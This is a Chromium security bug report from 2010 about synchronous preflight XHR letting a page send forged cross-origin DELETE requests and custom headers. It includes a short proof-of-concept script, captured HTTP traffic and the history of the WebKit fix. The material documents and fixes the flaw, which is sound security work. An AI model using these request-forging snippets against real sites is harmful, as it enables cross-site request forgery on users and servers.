New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 2 users

Issue metadata

Status: Fixed
Owner:
Closed: Apr 2010
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: 1
Type: Bug-Security

Restricted
  • Only users with Commit permission may comment.



Sign in to add a comment
link

Issue 39698: Security: Synchronous preflight XHR allows arbitrary XSRF

Reported by meder@google.com, Mar 29 2010 Project Member

Issue description

It's possible to specify HTTP method using XHR across domains:

<body>
  <script>
    var  xhttp=new XMLHttpRequest();
    xhttp.open("DELETE","http://o0o.nu/index.html",false);
    xhttp.send("");
    var xmlDoc = xhttp.responseXML;

    alert(xmlDoc);
  </script>
</body>
 

Comment 1 by abarth@chromium.org, Mar 29 2010

If this reproduces in WebKit nightly (which I'd expect it does), we'll want to track
this issue in bugs.webkit.org.

Comment 2 by abarth@chromium.org, Mar 29 2010

Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecSeverity-High

Comment 3 by meder@google.com, Mar 29 2010

custom headers are allowed too:
    xhttp.open("GET","http://o0o.nu/index.html",false);
    xhttp.setRequestHeader('X-XSRF-SPOOF', 'YES');
    xhttp.send("");

Comment 4 by lcam...@gmail.com, Mar 29 2010

Status: Untriaged
It reproduces on WebKit nightly. My hope is that someone on Chrome will be able to 
look into it, though, and scan through the entire implementation perhaps.

This is the principal security mechanism in XDC, so it's sad it shipped without a 
single test :-(

Comment 5 by jsc...@chromium.org, Mar 29 2010

Comment 6 by abarth@chromium.org, Mar 29 2010

I'll look into it.  The implementation has many tests.  It will be interesting to see
how this slipped through.

Comment 7 by infe...@chromium.org, Mar 29 2010

here is what is happening. we are sending the options request, just like firefox.
however looks like there is some error in processing the response that clearly says
delete is not supported. still we are sending the delete request.

----
GET /fd/page.html HTTP/1.1
Host: infernohacks.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.3 (KHTML,
like Gecko) Chrome/5.0.365.0 Safari/533.3
Accept:
application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "5c681ad-127-482f3b2300d40"
If-Modified-Since: Mon, 29 Mar 2010 17:18:05 GMT
----
OPTIONS /security/spoofpt.html HTTP/1.1
Host: securethoughts.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.3 (KHTML,
like Gecko) Chrome/5.0.365.0 Safari/533.3
Referer: http://infernohacks.com/fd/page.html
Access-Control-Request-Method: DELETE
Origin: http://infernohacks.com
Access-Control-Request-Headers: X-XSRF-SPOOF, Content-Type
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
---response-
HTTP/1.1 200 OK
Date: Mon, 29 Mar 2010 17:20:46 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_fcgid/2.3.5
mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Allow: GET,HEAD,POST,OPTIONS
Content-Length: 0
Content-Type: text/html
---

bad part-
DELETE /security/spoofpt.html HTTP/1.1
Host: securethoughts.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.3 (KHTML,
like Gecko) Chrome/5.0.365.0 Safari/533.3
Referer: http://infernohacks.com/fd/page.html
Content-Length: 0
Origin: http://infernohacks.com
X-XSRF-SPOOF: YES
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Comment 8 by infe...@chromium.org, Mar 29 2010

the issue does not reproduce on safari. so, looks like a problem in our bindings.
just analyzing bug to learn the webkit core :)

Comment 9 by abarth@chromium.org, Mar 29 2010

@inferno:  Thanks for the analysis.  You're welcome to take the bug if you'd like to
learn the full WebKit process.  :)

Comment 10 by jsc...@chromium.org, Mar 29 2010

I talked to inferno and it looks like this might be in our network layer. If there are 
no objections, I'm going to grab it.

Comment 11 by karen@chromium.org, Mar 30 2010

Labels: Mstone-5

Comment 12 by jsc...@chromium.org, Mar 30 2010

Status: Started
The bug is definitely in WebKit. I reported it here: 
https://bugs.webkit.org/show_bug.cgi?id=36843

Comment 13 by jsc...@chromium.org, Apr 1 2010

Summary: Security: Synchronous preflight XHR allows arbitrary XSRF
The problem applies to any synchronous preflight XHR, and appears to have been 
introduced in WebKit r47291. I have a WebKit patch up for review that includes tests 
for similar regressions in the future.

Comment 14 by jsc...@chromium.org, Apr 3 2010

Committed upstream in r57041: http://trac.webkit.org/changeset/57041
This should be a clean merge if someone wants to do it before I get back to my dev box 
on Monday.

Comment 15 by scarybea...@gmail.com, Apr 5 2010

Labels: -Mstone-5 Mstone-4.1
Status: FixUnreleased
http://src.chromium.org/viewvc/chrome?view=rev&revision=43595

Comment 16 by scarybea...@gmail.com, May 19 2010

Labels: -Restrict-View-SecurityTeam
Status: Fixed
Was fixed in 4.1.249.1059

Comment 17 by jsc...@chromium.org, Mar 21 2011

Labels: Type-Security

Comment 18 by jsc...@chromium.org, Oct 5 2011

Labels: SecImpacts-Stable
Batch update.

Comment 19 by bugdroid1@chromium.org, Oct 13 2012

Project Member
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.

Comment 20 by bugdroid1@chromium.org, Mar 10 2013

Project Member
Labels: -Area-WebKit -SecSeverity-High -Type-Security -SecImpacts-Stable Cr-Content Security-Impact-Stable Security-Severity-High Type-Bug-Security

Comment 21 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Severity-High Security_Severity-High

Comment 22 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 23 by bugdroid1@chromium.org, Apr 6 2013

Project Member
Labels: -Cr-Content Cr-Blink

Comment 24 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Sign in to add a comment